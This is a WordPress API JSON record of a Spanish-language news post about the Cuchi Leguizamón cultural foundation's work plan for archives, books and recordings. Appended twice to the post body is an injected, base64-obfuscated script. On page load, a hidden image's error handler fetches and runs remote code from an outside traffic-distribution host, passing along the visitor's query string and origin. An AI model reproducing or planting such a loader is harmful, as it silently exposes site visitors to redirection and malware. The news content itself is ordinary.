{"id":2550,"date":"2023-04-24T09:30:36","date_gmt":"2023-04-24T12:30:36","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2550"},"modified":"2025-08-14T00:18:18","modified_gmt":"2025-08-14T03:18:18","slug":"la-fundacion-legado-cultural-cuchi-leguizamon-presento-su-plan-de-trabajo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2550","title":{"rendered":"La Fundaci\u00f3n Legado Cultural Cuchi Leguizam\u00f3n present\u00f3 su plan de trabajo"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#760622\"><em>En el Centro Cultural Am\u00e9rica, la organizaci\u00f3n anunci\u00f3 las acciones que llevar\u00e1 adelante para poner en valor el legado cultural del compositor salte\u00f1o. El programa incluye la publicaci\u00f3n de libros, discos, un sitio web y la producci\u00f3n de material audiovisual.<\/em><\/h4>\n\n\n\n<p>El compositor salte\u00f1o Gustavo \u201cCuchi\u201d Leguizam\u00f3n cuenta en su legado musical con dos discos y una inconmensurable obra de folklore que se extendi\u00f3 de manera internacional. Es por ello que el programa de la Fundaci\u00f3n Cuchi Leguizam\u00f3n comprende un plan de trabajo que propone, entre otras cosas, la edici\u00f3n y publicaci\u00f3n de libros y discos, la creaci\u00f3n de un sitio web, la producci\u00f3n de material audiovisual y la presentaci\u00f3n de convenios con la Secretaria de Cultura de Salta, la Universidad Nacional de Salta, la Biblioteca y el Archivo provincial.<\/p>\n\n\n\n<p>Asimismo se invit\u00f3 a la comunidad en general a participar del proyecto Archivo Cuchi Leguizam\u00f3n. \u201cEl archivo se nutre del material que tiene la familia, pero tambi\u00e9n tenemos que entusiasmar a la gente para que donen copias u originales de los materiales que crean convenientes, para que toda la documentaci\u00f3n sobre el Cuchi est\u00e9 p\u00fablica, ordenada y sea de acceso libre\u201d, puntualiz\u00f3 Juan Mart\u00edn Leguizam\u00f3n, hijo del Cuchi y presidente de la Fundaci\u00f3n.<\/p>\n\n\n\n<p>La Fundaci\u00f3n cuenta con grabaciones de conciertos que el compositor salte\u00f1o brind\u00f3 en el Teatro San Mart\u00edn de Buenos Aires en 1986 grabados en alta calidad y que comprenden piezas in\u00e9ditas que, seg\u00fan estimaciones de Juan Mart\u00edn, alcanzar\u00edan para dos discos. Al programa de trabajo se le suma un proyecto editorial, referido a la poes\u00eda de Gustavo Leguizam\u00f3n, \u201ces una faceta menos difundida, pero tiene muchas letras de sus m\u00fasicas y adem\u00e1s una gran cantidad de poemas personales que no se encuentran publicados, pero nutren la obra del Cuchi\u201d, finaliza.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6827-la-fundacion-legado-cultural-cuchi-leguizamon-presento-su-plan-de-trabajo.jpg\" alt=\"\" width=\"195\" height=\"128\"\/><\/figure><\/div>\n\n\n<p>El espacio institucional que emprende la Instituci\u00f3n canaliza toda esa energ\u00eda en funci\u00f3n de desarrollar estos proyectos culturales con el acompa\u00f1amiento de artistas destacados. Los objetivos de la misma se vinculan con trabajo social y art\u00edstico, que permitan difundir la obra del int\u00e9rprete y compositor, a la vez que potencie y fortaleza las expresiones culturales de los circuitos independientes, alternativos y representativos de nuestra sociedad.<\/p>\n\n\n\n<p>Del lanzamiento participaron el secretar\u00edo de Gesti\u00f3n Cultural del Ministerio de Cultura de Naci\u00f3n,&nbsp;<strong>Federico Prieto<\/strong>, la coordinadora del Archivo y Bibliotecas de la Provincia,&nbsp;<strong>Paula Bertini<\/strong>, junto a artistas, autoridades provinciales y municipales y amigos de la Fundaci\u00f3n Cuchi Leguizam\u00f3n.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/la-fundacion-legado-cultural-cuchi-leguizamon-presento-su-plan-de-trabajo-89268\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el Centro Cultural Am\u00e9rica, la organizaci\u00f3n anunci\u00f3 las acciones que llevar\u00e1 adelante para poner en valor el legado cultural del compositor salte\u00f1o. El programa incluye la publicaci\u00f3n de libros, discos, un sitio web y la producci\u00f3n de material audiovisual. El compositor salte\u00f1o Gustavo \u201cCuchi\u201d Leguizam\u00f3n cuenta en su legado musical con dos discos y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2551,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-2550","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2550"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2550"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2550\/revisions"}],"predecessor-version":[{"id":7104,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2550\/revisions\/7104"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2551"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2550"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2550"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2550"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}